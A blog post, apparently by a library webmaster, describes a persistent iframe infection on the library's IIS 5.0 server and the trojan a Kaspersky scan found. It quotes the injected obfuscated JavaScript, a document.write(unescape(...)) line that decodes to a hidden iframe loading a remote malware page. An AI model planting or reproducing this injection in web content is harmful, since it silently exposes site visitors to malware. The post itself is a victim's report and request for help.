Malicious Javascript Update

As mentioned previously, we have been plagued as of late by a particularly nasty and resilient bit of iframe hacking.  While our Trend Micro software managed to pick up absolutely nada I discovered that Kaspersky has an online scanner.  Roughly 3 hours and 19 minutes later and voila!  8 infected files and 5 viruses! Not to mention a ridiculous amount of locked files.  Among those 5 viruses is a little sucker named “Trojan-Downloader.HTML.IFrame.bu” which I’m hoping is the tenacious bastard responsible for our little problem.

Advertisements

Malicious javascript: document.write (unescape

Some malicious javascript has been appearing on the website of the library I work at:

document.write(unescape(‘%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%6E%39%36%2E%64%6E%73%2E%67%65%6E%64%69%73%74%72%2E%69%6E%66%6F%2F%71%75%61%6C%69%74%79%74%65%73%74%2F%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E’));

this translates to:

iframe src=”http://mn96.dns.gendistr.info/qualitytest/” height=”0″ width=”0″

The website attempts to offer a virus disguised as ad protection software.  I can delete the code but it reappears (likely if/when the server is rebooted).  The code goes deep enough to appear in the iisstart.asp, localstart.asp, and browser_detect.asp.   Since I’m technically only the webmaster (for a new webpage that isn’t even up yet, don’t ask, I don’t manage the servers or other hardware) with exactly 0 experience with IIS (we have a consultant for that) I’m not sure where to go from here.

We’re running IIS 5.0 and I, for the life of me, can’t figure what item (if any) allows the replication of the code. Any help would be much appreciated.

P.S.:  To make matters worse the wwwroot folder is clogged with sh*ttons of legacy files that no-one needs/uses.